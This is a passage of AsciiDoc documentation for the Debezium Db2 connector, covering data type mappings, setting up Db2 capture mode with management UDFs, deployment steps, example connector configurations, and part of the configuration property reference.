tombstone event that has the same key but a `null` value.\n\n\/\/ Type: reference\n\/\/ ModuleID: how-debezium-db2-connectors-map-data-types\n\/\/ Title: How {prodname} Db2 connectors map data types\n[[db2-data-types]]\n== Data type mappings\n\nDb2's data types are described in https:\/\/www.ibm.com\/support\/knowledgecenter\/en\/SSEPGG_11.5.0\/com.ibm.db2.luw.sql.ref.doc\/doc\/r0008483.html[Db2 SQL Data Types].\n\nThe Db2 connector represents changes to rows with events that are structured like the table in which the row exists. The event contains a field for each column value. How that value is represented in the event depends on the Db2 data type of the column. This section describes these mappings.\n\nifdef::product[]\nDetails are in the following sections:\n\n* xref:db2-basic-types[]\n* xref:db2-temporal-types[]\n* xref:db2-timestamp-types[]\n* xref:db2-decimal-types[]\n\nendif::product[]\n\n[id=\"db2-basic-types\"]\n=== Basic types\n\nThe following table describes how the connector maps each of the Db2 data types to a _literal type_ and a _semantic type_ in event fields.\n\n* _literal type_ describes how the value is represented using Kafka Connect schema types: `INT8`, `INT16`, `INT32`, `INT64`, `FLOAT32`, `FLOAT64`, `BOOLEAN`, `STRING`, `BYTES`, `ARRAY`, `MAP`, and `STRUCT`.\n\n* _semantic type_ describes how the Kafka Connect schema captures the _meaning_ of the field using the name of the Kafka Connect schema for the field.\n\n.Mappings for Db2 basic data types\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|Db2 data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`BOOLEAN`\n|`BOOLEAN`\n|Only snapshots can be taken from tables with BOOLEAN type columns. Currently SQL Replication on Db2 does not support BOOLEAN, so Debezium can not perform CDC on those tables. Consider using a different type.\n\n\n|`BIGINT`\n|`INT64`\n|n\/a\n\n|`BINARY`\n|`BYTES`\n|n\/a\n\n|`BLOB`\n|`BYTES`\n|n\/a\n\n|`CHAR[(N)]`\n|`STRING`\n|n\/a\n\n|`CLOB`\n|`STRING`\n|n\/a\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date` +\n +\nString representation of a timestamp without timezone information\n\n|`DECFLOAT`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal`\n\n|`DECIMAL`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal`\n\n|`DBCLOB`\n|`STRING`\n|n\/a\n\n|`DOUBLE`\n|`FLOAT64`\n|n\/a\n\n|`INTEGER`\n|`INT32`\n|n\/a\n\n|`REAL`\n|`FLOAT32`\n|n\/a\n\n|`SMALLINT`\n|`INT16`\n|n\/a\n\n|`TIME`\n|`INT32`\n|`io.debezium.time.Time` +\n +\nString representation of a time without timezone information\n\n|`TIMESTAMP`\n|`INT64`\n|`io.debezium.time.MicroTimestamp` +\n +\nString representation of a timestamp without timezone information\n\n|`VARBINARY`\n|`BYTES`\n|n\/a\n\n|`VARCHAR[(N)]`\n|`STRING`\n|n\/a\n\n|`VARGRAPHIC`\n|`STRING`\n|n\/a\n\n|`XML`\n|`STRING`\n|`io.debezium.data.Xml` +\n +\nString representation of an XML document\n|===\n\nIf present, a column's default value is propagated to the corresponding field's Kafka Connect schema. Change events contain the field's default value unless an explicit column value had been given. Consequently, there is rarely a need to obtain the default value from the schema.\nifdef::community[]\nPassing the default value helps satisfy compatibility rules when {link-prefix}:{link-avro-serialization}[using Avro] as the serialization format together with the Confluent schema registry.\nendif::community[]\n\n[[db2-temporal-types]]\n=== Temporal types\n\nOther than Db2's `DATETIMEOFFSET` data type, which contains time zone information, how temporal types are mapped depends on the value of the `time.precision.mode` connector configuration property. The following sections describe these mappings:\n\n* xref:db2-time-precision-mode-adaptive[`time.precision.mode=adaptive`]\n* xref:db2-time-precision-mode-connect[`time.precision.mode=connect`]\n\n[[db2-time-precision-mode-adaptive]]\n.`time.precision.mode=adaptive`\nWhen the `time.precision.mode` configuration property is set to `adaptive`, the default, the connector determines the literal type and semantic type based on the column's data type definition. This ensures that events _exactly_ represent the values in the database.\n\n.Mappings when `time.precision.mode` is `adaptive`\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|Db2 data type |Literal type (schema type) |Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME(0)`, `TIME(1)`, `TIME(2)`, `TIME(3)`\n|`INT32`\n|`io.debezium.time.Time` +\n +\nRepresents the number of milliseconds past midnight, and does not include timezone information.\n\n|`TIME(4)`, `TIME(5)`, `TIME(6)`\n|`INT64`\n|`io.debezium.time.MicroTime` +\n +\nRepresents the number of microseconds past midnight, and does not include timezone information.\n\n|`TIME(7)`\n|`INT64`\n|`io.debezium.time.NanoTime` +\n +\nRepresents the number of nanoseconds past midnight, and does not include timezone information.\n\n|`DATETIME`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`SMALLDATETIME`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`DATETIME2(0)`, `DATETIME2(1)`, `DATETIME2(2)`, `DATETIME2(3)`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`DATETIME2(4)`, `DATETIME2(5)`, `DATETIME2(6)`\n|`INT64`\n|`io.debezium.time.MicroTimestamp` +\n +\nRepresents the number of microseconds since the epoch, and does not include timezone information.\n\n|`DATETIME2(7)`\n|`INT64`\n|`io.debezium.time.NanoTimestamp` +\n +\nRepresents the number of nanoseconds past the epoch, and does not include timezone information.\n|===\n\n[[db2-time-precision-mode-connect]]\n.`time.precision.mode=connect`\nWhen the `time.precision.mode` configuration property is set to `connect`, the connector uses Kafka Connect logical types. This may be useful when consumers can handle only the built-in Kafka Connect logical types and are unable to handle variable-precision time values. However, since Db2 supports tenth of a microsecond precision, the events generated by a connector with the `connect` time precision *results in a loss of precision* when the database column has a _fractional second precision_ value that is greater than 3.\n\n.Mappings when `time.precision.mode` is `connect`\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|Db2 data type |Literal type (schema type) |Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`org.apache.kafka.connect.data.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME([P])`\n|`INT64`\n|`org.apache.kafka.connect.data.Time` +\n +\nRepresents the number of milliseconds since midnight, and does not include timezone information. Db2 allows `P` to be in the range 0-7 to store up to tenth of a microsecond precision, though this mode results in a loss of precision when `P` is greater than 3.\n\n|`DATETIME`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`SMALLDATETIME`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`DATETIME2`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information. Db2 allows `P` to be in the range 0-7 to store up to tenth of a microsecond precision, though this mode results in a loss of precision when `P` is greater than 3.\n|===\n\n[[db2-timestamp-types]]\n=== Timestamp types\n\nThe `DATETIME`, `SMALLDATETIME` and `DATETIME2` types represent a timestamp without time zone information.\nSuch columns are converted into an equivalent Kafka Connect value based on UTC. For example, the `DATETIME2` value \"2018-06-20 15:13:16.945104\" is represented by an `io.debezium.time.MicroTimestamp` with the value \"1529507596945104\".\n\nThe timezone of the JVM running Kafka Connect and {prodname} does not affect this conversion.\n\n[[db2-decimal-types]]\n=== Decimal types\n\n[cols=\"27%a,18%a,55%a\",options=\"header\"]\n|===\n|Db2 data type |Literal type (schema type) |Semantic type (schema name) and Notes\n\n|`NUMERIC[(P[,S])]`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.\nThe `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.\n\n|`DECIMAL[(P[,S])]`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.\nThe `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.\n\n|`SMALLMONEY`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point iss shifted.\nThe `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.\n\n|`MONEY`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.\nThe `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.\n|===\n\n\/\/ Type: procedure\n\/\/ ModuleID: setting-up-db2-to-run-a-debezium-connector\n\/\/ Title: Setting up Db2 to run a {prodname} connector\n[[setting-up-db2]]\n== Set up\n\nA database administrator must put tables into capture mode before you can run a {prodname} Db2 connector to capture changes that are committed to a Db2 database. To put tables into capture mode, {prodname} provides a set of user-defined functions (UDFs) for your convenience. The procedure here shows how to install and run these management UDFs. Alternatively, you can run Db2 control commands to put tables into capture mode.\n\nThis procedure assumes that you are logged in as the `db2instl` user, which is the default instance and user name when using the Db2 docker container image.\n\n.Prerequisites\n\n* On the machine on which Db2 is running, the content in `debezium-connector-db2\/src\/test\/docker\/db2-cdc-docker` is available in the `$HOME\/asncdctools\/src` directory.\n\n.Procedure\n\n. Compile the {prodname} management UDFs on the Db2 server host by using the `bldrtn`\ncommand provided with Db2:\n+\n[source,shell]\n----\ncd $HOME\/asncdctools\/src\n----\n+\n[source,shell]\n----\n.\/bldrtn asncdc\n----\n\n. Start the database if it is not already running. Replace `DB_NAME` with the name of the database that you want {prodname} to connect to.\n+\n[source,shell]\n----\ndb2 start db DB_NAME\n----\n\n. Ensure that JDBC can read the Db2 metadata catalog:\n+\n[source,shell]\n----\ncd $HOME\/sqllib\/bnd\n----\n+\n[source,shell]\n----\ndb2 bind db2schema.bnd blocking all grant public sqlerror continue\n----\n\n. Ensure that the database was recently backed-up. The ASN agents must have a recent starting point to read from. If you need to perform a backup, run the following commands, which prune the data so that only the most recent version is available. If you do not need to retain the older versions of the data, specify `dev\/null` for the backup location.\n\n.. Back up the database. Replace `DB_NAME` and `BACK_UP_LOCATION` with appropriate values:\n+\n[source,shell]\n----\ndb2 backup db DB_NAME to BACK_UP_LOCATION\n----\n\n.. Restart the database:\n+\n[source,shell]\n----\ndb2 restart db DB_NAME\n----\n\n. Connect to the database to install the {prodname} management UDFs. It is assumed that you are logged in as the `db2instl` user so the UDFs should be installed on the `db2inst1` user.\n+\n[source,shell]\n----\ndb2 connect to DB_NAME\n----\n\n. Copy the {prodname} management UDFs and set permissions for them:\n+\n[source,shell]\n----\ncp $HOME\/asncdctools\/src\/asncdc $HOME\/sqllib\/function\n----\n+\n[source,shell]\n----\nchmod 777 $HOME\/sqllib\/function\n----\n\n. Enable the {prodname} UDF that starts and stops the ASN capture agent:\n+\n[source,shell]\n----\ndb2 -tvmf $HOME\/asncdctools\/src\/asncdc_UDF.sql\n----\n\n. Create the ASN control tables:\n+\n[source,shell]\n----\n$ db2 -tvmf $HOME\/asncdctools\/src\/asncdctables.sql\n----\n\n. Enable the {prodname} UDF that adds tables to capture mode and removes tables from capture mode:\n+\n[source,shell]\n----\n$ db2 -tvmf $HOME\/asncdctools\/src\/asncdcaddremove.sql\n----\n+\nAfter you set up the Db2 server, use the UDFs to control Db2 replication (ASN) with SQL commands. Some of the UDFs expect a return value in which case you use the SQL `VALUE` statement to invoke them. For other UDFs, use the SQL `CALL` statement.\n\n. Start the ASN agent:\n+\n[source,sql]\n----\nVALUES ASNCDC.ASNCDCSERVICES('start','asncdc');\n----\n\n. Put tables into capture mode. Invoke the following statement for each table that you want to put into capture. Replace `MYSCHEMA` with the name of the schema that contains the table you want to put into capture mode. Likewise, replace `MYTABLE` with the name of the table to put into capture mode:\n+\n[source,sql]\n----\nCALL ASNCDC.ADDTABLE('MYSCHEMA', 'MYTABLE');\n----\n\n. Reinitialize the ASN service:\n+\n[source,sql]\n----\nVALUES ASNCDC.ASNCDCSERVICES('reinit','asncdc');\n----\n\n.Additional resource\n\n{link-prefix}:{link-db2-connector}#managing-debezium-db2-connectors[Reference table for {prodname} Db2 management UDFs]\n\n\/\/ Type: assembly\n\/\/ ModuleID: deploying-debezium-db2-connectors\n\/\/ Title: Deploying {prodname} Db2 connectors\n[[db2-deploying-a-connector]]\n== Deployment\n\nifdef::community[]\n\nWith https:\/\/zookeeper.apache.org[Zookeeper], http:\/\/kafka.apache.org\/[Kafka], and {link-kafka-docs}.html#connect[Kafka Connect] installed, the remaining tasks to deploy a {prodname} Db2 connector are:\n\n. Download the link:https:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-db2\/{debezium-version}\/debezium-connector-db2-{debezium-version}-plugin.tar.gz[connector's plug-in archive].\n\n. Extract the JAR files into your Kafka Connect environment.\n. Add the directory with the JAR files to {link-kafka-docs}\/#connectconfigs[Kafka Connect's `plugin.path`].\n. Obtain the link:https:\/\/www.ibm.com\/support\/pages\/db2-jdbc-driver-versions-and-downloads[JDBC driver for Db2].\n. Add the JDBC driver JAR file to the directory with the {prodname} Db2 connector JARs.\n. {link-prefix}:{link-db2-connector}#db2-adding-connector-configuration[Configure the connector and add the configuration to your Kafka Connect cluster.]\n. Restart your Kafka Connect process to pick up the new JAR files.\n\nIf you are working with immutable containers, see link:https:\/\/hub.docker.com\/r\/debezium\/[{prodname}'s Container images] for Zookeeper, Kafka and Kafka Connect with the Db2 connector already installed and ready to run.\nYou can also xref:operations\/openshift.adoc[run {prodname} on Kubernetes and OpenShift].\nendif::community[]\n\nifdef::product[]\nTo deploy a {prodname} Db2 connector, install the {prodname} Db2 connector archive, configure the connector, and start the connector by adding its configuration to Kafka Connect. Details are in the following topics:\n\n* xref:steps-for-installing-debezium-db2-connectors[]\n* xref:debezium-db2-connector-configuration-example[]\n* xref:adding-debezium-db2-connector-configuration-to-kafka-connect[]\n* xref:descriptions-of-debezium-db2-connector-configuration-properties[]\n\n\/\/ Type: concept\n[id=\"steps-for-installing-debezium-db2-connectors\"]\n=== Steps for installing {prodname} Db2 connectors\n\nTo install the Db2 connector, follow the procedures in {LinkDebeziumInstallOpenShift}[{NameDebeziumInstallOpenShift}]. The main steps are:\n\n. {LinkDebeziumUserGuide}#setting-up-db2-to-run-a-debezium-connector[Set up Db2 to run a {prodname} connector]. This enables Db2 replication to expose change-data for tables that are in capture mode.\n\n. Use link:https:\/\/access.redhat.com\/products\/red-hat-amq#streams[Red Hat AMQ Streams] to set up Apache Kafka and Kafka Connect on OpenShift. AMQ Streams offers operators and images that bring Kafka to OpenShift.\n\n. Download the {prodname} link:https:\/\/access.redhat.com\/jbossnetwork\/restricted\/listSoftware.html?product=red.hat.integration&downloadType=distributions[Db2 connector].\n\n. Extract the files into your Kafka Connect environment.\n. Add the plug-in's parent directory to your Kafka Connect `plugin.path`, for example:\n+\n[source]\n----\nplugin.path=\/kafka\/connect\n----\n+\nThe above example assumes that you extracted the {prodname} Db2 connector to the `\/kafka\/connect\/{prodname}-connector-db2` path.\n\n. Restart your Kafka Connect process to ensure that the new JAR files are picked up.\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-db2-connector-configuration-example\n\/\/ Title: {prodname} Db2 connector configuration example\n[[db2-example-configuration]]\n=== Connector configuration example\n\nifdef::community[]\n\n[[db2-example]]\n\nFollowing is an example of the configuration for a Db2 connector that connects to a Db2 server on port 50000 at 192.168.99.100, whose logical name is `fullfillment`. Typically, you configure the {prodname} Db2 connector in a `.json` file using the configuration properties available for the connector.\n\nYou can choose to produce events for a subset of the schemas and tables. Optionally, ignore, mask, or truncate columns that are sensitive, too large, or not needed.\n\n[source,json]\n----\n{\n \"name\": \"db2-connector\", \/\/ <1>\n \"config\": {\n \"connector.class\": \"io.debezium.connector.db2.Db2Connector\", \/\/ <2>\n \"database.hostname\": \"192.168.99.100\", \/\/ <3>\n \"database.port\": \"50000\", \/\/ <4>\n \"database.user\": \"db2inst1\", \/\/ <5>\n \"database.password\": \"Password!\", \/\/ <6>\n \"database.dbname\": \"mydatabase\", \/\/ <7>\n \"database.server.name\": \"fullfillment\", \/\/ <8>\n \"table.include.list\": \"MYSCHEMA.CUSTOMERS\", \/\/ <9>\n \"database.history.kafka.bootstrap.servers\": \"kafka:9092\", \/\/ <10>\n \"database.history.kafka.topic\": \"dbhistory.fullfillment\" \/\/ <11>\n }\n}\n----\n<1> The name of the connector when registered with a Kafka Connect service.\n<2> The name of this Db2 connector class.\n<3> The address of the Db2 instance.\n<4> The port number of the Db2 instance.\n<5> The name of the Db2 user.\n<6> The password for the Db2 user.\n<7> The name of the database to capture changes from.\n<8> The logical name of the Db2 instance\/cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the {link-prefix}:{link-avro-serialization}[Avro Connector] is used.\n<9> A list of all tables whose changes {prodname} should capture.\n<10> The list of Kafka brokers that this connector uses to write and recover DDL statements to the database history topic.\n<11> The name of the database history topic where the connector writes and recovers DDL statements. This topic is for internal use only and should not be used by consumers.\n\nendif::community[]\n\nifdef::product[]\n\nFollowing is an example of the configuration for a Db2 connector that connects to a Db2 server on port 50000 at 192.168.99.100, whose logical name is `fullfillment`. Typically, you configure a {prodname} Db2 connector in a `.yaml` file using the configuration properties available for the connector.\n\nYou can choose to produce events for a subset of the schemas and tables. Optionally, ignore, mask, or truncate columns that are sensitive, too large, or not needed.\n\n[source,yaml,options=\"nowrap\",subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\n kind: KafkaConnector\n metadata:\n name: inventory-connector \/\/ <1>\n labels: strimzi.io\/cluster: my-connect-cluster\n spec:\n class: io.debezium.connector.db2.Db2Connector\n tasksMax: 1 \/\/ <2>\n config: \/\/ <3>\n database.hostname: 192.168.99.100 \/\/ <4>\n database.port: 50000\n database.user: db2inst1\n database.password: Password!\n database.dbname: mydatabase\n database.server.name: fullfillment \/\/ <5>\n database.include.list: public.inventory \/\/ <6>\n----\n\n.Descriptions of connector configuration settings\n[cols=\"1,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Item |Description\n\n|1\n|The name of the connector.\n\n|2\n|Only one task should operate at any one time.\n\n|3\n|The connector\u2019s configuration.\n\n|4\n|The database host, which is the address of the Db2 instance.\n\n|5\n|The logical name of the Db2 instance\/cluster, which forms a namespace and is used in the names of the Kafka topics to which the connector writes, the names of Kafka Connect schemas, and the namespaces of the corresponding Avro schema when the {link-prefix}:{link-avro-serialization}[Avro Connector] is used.\n\n|6\n|Changes in only the `public.inventory` database are captured.\n\n|===\n\nendif::product[]\n\nSee the {link-prefix}:{link-db2-connector}#db2-connector-properties[complete list of connector properties] that you can specify in these configurations.\n\nYou can send this configuration with a `POST` command to a running Kafka Connect service. The service records the configuration and starts one connector task that connects to the Db2 database, reads change-data tables for tables in capture mode, and streams change event records to Kafka topics.\n\n\/\/ Type: procedure\n\/\/ ModuleID: adding-debezium-db2-connector-configuration-to-kafka-connect\n\/\/ Title: Adding {prodname} Db2 connector configuration to Kafka Connect\n[[db2-adding-connector-configuration]]\n=== Adding connector configuration\n\nifdef::community[]\nTo start running a Db2 connector, create a connector configuration and add the configuration to your Kafka Connect cluster.\n\n.Prerequisites\n\n* The {link-prefix}:{link-db2-connector}#setting-up-db2-to-run-a-debezium-connector[Db2 replication] is enabled to expose change-data for tables that are in capture mode\n\n* The Db2 connector is installed.\n\n.Procedure\n\n. Create a configuration for the Db2 connector.\n\n. Use the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster.\n\nendif::community[]\n\nifdef::product[]\nYou can use a provided {prodname} container to deploy a {prodname} Db2 connector. In this procedure, you build a custom Kafka Connect container image for {prodname}, configure the {prodname} connector as needed, and then add your connector configuration to your Kafka Connect environment.\n\n.Prerequisites\n\n* Podman or Docker is installed and you have sufficient rights to create and manage containers.\n* You installed the {prodname} Db2 connector archive.\n\n.Procedure\n\n. Extract the {prodname} Db2 connector archive to create a directory structure for the connector plug-in, for example:\n+\n[subs=+macros]\n----\npass:quotes[*tree .\/my-plugins\/*]\n.\/my-plugins\/\n\u251c\u2500\u2500 debezium-connector-db2\n\u2502 \u251c\u2500\u2500 ...\n----\n\n. Create and publish a custom image for running your {prodname} connector:\n\n.. Create a new `Dockerfile` by using `{DockerKafkaConnect}` as the base image. In the following example, you would replace _my-plugins_ with the name of your plug-ins directory:\n+\n[subs=\"+macros,+attributes\"]\n----\nFROM {DockerKafkaConnect}\nUSER root:root\npass:quotes[COPY _.\/my-plugins\/_ \/opt\/kafka\/plugins\/]\nUSER 1001\n----\n+\nBefore Kafka Connect starts running the connector, Kafka Connect loads any third-party plug-ins that are in the `\/opt\/kafka\/plugins` directory.\n\n.. Build the container image. For example, if you saved the `Dockerfile` that you created in the previous step as `debezium-container-for-db2`, and if the `Dockerfile` is in the current directory, then you would run the following command:\n+\n`podman build -t debezium-container-for-db2:latest .`\n\n.. Push your custom image to your container registry, for example:\n+\n`podman push debezium-container-for-db2:latest`\n\n.. Point to the new container image. Do one of the following:\n+\n* Edit the `spec.image` property of the `KafkaConnector` custom resource. If set, this property overrides the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable in the Cluster Operator. For example:\n+\n[source,yaml,subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\nkind: KafkaConnector\nmetadata:\n name: my-connect-cluster\nspec:\n #...\n image: debezium-container-for-db2\n----\n+\n* In the `install\/cluster-operator\/050-Deployment-strimzi-cluster-operator.yaml` file, edit the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable to point to the new container image and reinstall the Cluster Operator. If you edit this file you must apply it to your OpenShift cluster.\n\n. Create a `KafkaConnector` custom resource that defines your {prodname} Db2 connector instance. See {LinkDebeziumUserGuide}#debezium-db2-connector-configuration-example[the connector configuration example].\n\n. Apply the connector instance, for example:\n+\n`oc apply -f inventory-connector.yaml`\n+\nThis registers `inventory-connector` and the connector starts to run against the `inventory` database.\n\n. Verify that the connector was created and has started to capture changes in the specified database. You can verify the connector instance by watching the Kafka Connect log output as, for example, `inventory-connector` starts.\n\n.. Display the Kafka Connect log output:\n+\n[source,shell,options=\"nowrap\"]\n----\noc logs $(oc get pods -o name -l strimzi.io\/name=my-connect-cluster-connect)\n----\n\n.. Review the log output to verify that the initial snapshot has been executed. You should see something like the following lines:\n+\n[source,shell,options=\"nowrap\"]\n----\n... INFO Starting snapshot for ...\n... INFO Snapshot is using user 'debezium' ...\n----\n\nendif::product[]\n\n.Results\n\nWhen the connector starts, it {link-prefix}:{link-db2-connector}#db2-snapshots[performs a consistent snapshot] of the Db2 database tables that the connector is configured to capture changes for. The connector then starts generating data change events for row-level operations and streaming change event records to Kafka topics.\n\n\/\/ Type: reference\n\/\/ ModuleID: descriptions-of-debezium-db2-connector-configuration-properties\n\/\/ Title: Description of {prodname} Db2 connector configuration properties\n[[db2-connector-properties]]\n=== Connector properties\n\nThe {prodname} Db2 connector has numerous configuration properties that you can use to achieve the right connector behavior for your application. Many properties have default values. Information about the properties is organized as follows:\n\n* xref:db2-required-configuration-properties[Required configuration properties]\n* xref:db2-advanced-configuration-properties[Advanced configuration properties]\n* xref:db2-pass-through-properties[Pass-through configuration properties]\n\n[id=\"db2-required-configuration-properties\"]\nThe following configuration properties are _required_ unless a default value is available.\n\n.Required connector configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property |Default |Description\n\n|[[db2-property-name]]<<db2-property-name, `+name+`>>\n|\n|Unique name for the connector. Attempting to register again with the same name will fail. This property is required by all Kafka Connect connectors.\n\n|[[db2-property-connector-class]]<<db2-property-connector-class, `+connector.class+`>>\n|\n|The name of the Java class for the connector. Always use a value of `io.debezium.connector.db2.Db2Connector` for the Db2 connector.\n\n|[[db2-property-tasks-max]]<<db2-property-tasks-max, `+tasks.max+`>>\n|`1`\n|The maximum number of tasks that should be created for this connector. The Db2 connector always uses a single task and therefore does not use this value, so the default is always acceptable.\n\n|[[db2-property-database-hostname]]<<db2-property-database-hostname, `+database.hostname+`>>\n|\n|IP address or hostname of the Db2 database server.\n\n|[[db2-property-database-port]]<<db2-property-database-port, `+database.port+`>>\n|`50000`\n|Integer port number of the Db2 database server.\n\n|[[db2-property-database-user]]<<db2-property-database-user, `+database.user+`>>\n|\n|Name of the Db2 database user for connecting to the Db2 database server.\n\n|[[db2-property-database-password]]<<db2-property-database-password, `+database.password+`>>\n|\n|Password to use when connecting to the Db2 database server.\n\n|[[db2-property-database-dbname]]<<db2-property-database-dbname, `+database.dbname+`>>\n|\n|The name of the Db2 database from which to stream the changes\n\n|[[db2-property-database-server-name]]<<db2-property-database-server-name, `+database.server.name+`>>\n|\n|Logical name that identifies and provides a namespace for the particular Db2 database server that hosts the database for which {prodname} is capturing changes. Only alphanumeric characters and underscores should be used in the database server logical name. The logical name should be unique across all other connectors, since it is used as a topic name prefix for all Kafka topics that receive records from this connector.\n\n|[[db2-property-database-history-kafka-topic]]<<db2-property-database-history-kafka-topic, `+database.history.kafka.topic+`>>\n|\n|The full name of the Kafka topic where the connector stores the database schema history.\n\n|[[db2-property-database-history-kafka-bootstrap-servers]]<<db2-property-database-history-kafka-bootstrap-servers, `+database.history.kafka.bootstrap.servers+`>>\n|\n|A list of host\/port pairs that the connector uses to establish an initial connection to the Kafka cluster. This connection is used for retrieving database schema history previously stored by the connector, and for writing each DDL statement read from the source database. Each pair should point to the same Kafka cluster used by the {prodname} Kafka Connect process.\n\n|[[db2-property-table-include-list]]<<db2-property-table-include-list, `+table.include.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you want the connector to capture. Any table not included in the include list does not have its changes captured. Each identifier is of the form _schemaName_._tableName_. By default, the connector captures changes in every non-system table. Do not also set the `table.exclude.list` property.\n\n|[[db2-property-table-exclude-list]]<<db2-property-table-exclude-list, `+table.exclude.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you do not want the connector to capture. The connector captures changes in each non-system table that is not included in the exclude list. Each identifier is of the form _schemaName_._tableName_. Do not also set the `table.include.list` property.\n\n|[[db2-property-column-exclude-list]]<<db2-property-column-exclude-list, `+column.exclude.list+`>>\n|_empty string_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns to exclude from change event values.\nFully-qualified names for columns are of the form _schemaName_._tableName_._columnName_.\nPrimary key columns are always included in the event's key, even if they are excluded from the value.\n\n|[[db2-property-column-mask-hash]]<<db2-property-column-mask-hash, `+column.mask.hash._hashAlgorithm_.with.salt._salt_+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be pseudonyms in change event values. A pseudonym is a field value that consists of the hashed value obtained by applying the `_hashAlgorithm_` algorithm and the `_salt_` salt that you specify in the property name. +\n +\nBased on the hash algorithm applied, referential integrity is kept while data is masked. Supported hash algorithms are described in the {link-java7-standard-names}[MessageDigest section] of the Java Cryptography Architecture Standard Algorithm Name Documentation.\nThe hash value is automatically shortened to the length of the column. +\n +\nYou can specify multiple instances of this property with different algorthims and salts. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. For example: +\n +\n`column.mask.hash.SHA-256.with.salt.CzQMA0cB5K =` + `inventory.orders.customerName, inventory.shipment.customerName` +\n +\nwhere `CzQMA0cB5K` is a randomly selected salt.\n +\nDepending on the `_hashAlgorithm_` used, the `_salt_` selected, and the actual data set, the field value may not be completely masked.\n\n|[[db2-property-time-precision-mode]]<<db2-property-time-precision-mode, `+time.precision.mode+`>>\n|`adaptive`\n| Time, date, and timestamps can be represented with different kinds of precision: +\n +\n`adaptive` captures the time and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type. +\n +\n`connect` always represents time and timestamp values by using Kafka Connect's built-in representations for `Time`, `Date`, and `Timestamp`, which uses millisecond precision regardless of the database columns' precision. See {link-prefix}:{link-db2-connector}#db2-temporal-values[temporal values].\n\n|[[db2-property-tombstones-on-delete]]<<db2-property-tombstones-on-delete, `+tombstones.on.delete+`>>\n|`true`\n| Controls whether a tombstone event should be generated after a _delete_ event. +\n +\n`true` - delete operations are represented by a _delete_ event and a subsequent tombstone event. +\n +\n`false` - only a _delete_ event is sent. +\n +\nAfter a _delete_ operation, emitting a tombstone event enables Kafka to delete all change event records that have the same key as the deleted row.\n\n|[[db2-property-include-schema-changes]]<<db2-property-include-schema-changes, `+include.schema.changes+`>>\n|`true`\n|Boolean value that specifies whether the connector should publish changes in the database schema to a Kafka topic with the same name as the database server ID. Each schema change is recorded with a key that contains the database name and a value that is a JSON structure that describes the schema update. This is independent of how the connector internally records database history.\n\n|[[db2-property-column-truncate-to-length-chars]]<<db2-property-column-truncate-to-length-chars, `+column.truncate.to._length_.chars+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event records, values in these columns are truncated if they are longer than the number of characters specified by _length_ in the property name. You can specify multiple properties with different lengths in a single configuration. Length must be a positive integer, for example, `column.truncate.to.20.chars`.\n\n|[[db2-property-column-mask-with-length-chars]]<<db2-property-column-mask-with-length-chars, `+column.mask.with._length_.chars+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event values, the values in the specified table columns are replaced with _length_ number of asterisk (`*`) characters. 